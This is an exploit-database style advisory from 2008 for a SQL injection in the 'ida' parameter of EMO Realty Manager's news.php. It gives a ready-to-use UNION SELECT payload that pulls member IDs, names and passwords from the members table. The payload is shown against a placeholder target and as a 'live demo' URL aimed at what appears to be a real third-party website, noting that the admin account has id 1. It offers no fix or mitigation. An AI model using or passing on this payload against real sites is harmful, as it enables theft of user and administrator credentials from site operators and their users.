EMO Realty Manager (news.php ida) SQL Injection Vulnerability

2008-05-13
ID: 3010
CVE: None
Download vulnerable application: None
##########################################################
#                    Remote SQL Injection Vulnerabilities#
#                           EMO Realty Manager           #
##########################################################
 
 
## Author : HaCkeR_EgY
 
## Script Name : EMO Realty Manager
 
 
## Download : http://www.emophp.com/
 
 
## Price : Manager Full License CAD $399   /// Manager Base License CAD $299=======>  Buy iT : http://www.emophp.com/purchase.php
 
 
###########################################################################
###########################################################################
 
## D0rk : mmmm...... U have 2 dork  ...Let's say use your Mind again  D:
 
 
## ExPlo!T :
 
=====>> http://target.com/path/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*
## L!ve Dem0 :
 
 
======>>http://sellrentcanada.com/aaa/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*
 
-----N0TE----  Admin INFO  have (id) number 1
 
 
################################################################################

[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : Mr.SQL , Mohamed el Arab ,F!resell, DaRk MaStEr , H-T Team , Stack-Terrorist
 
#################################################################################


1-4-2 (www01)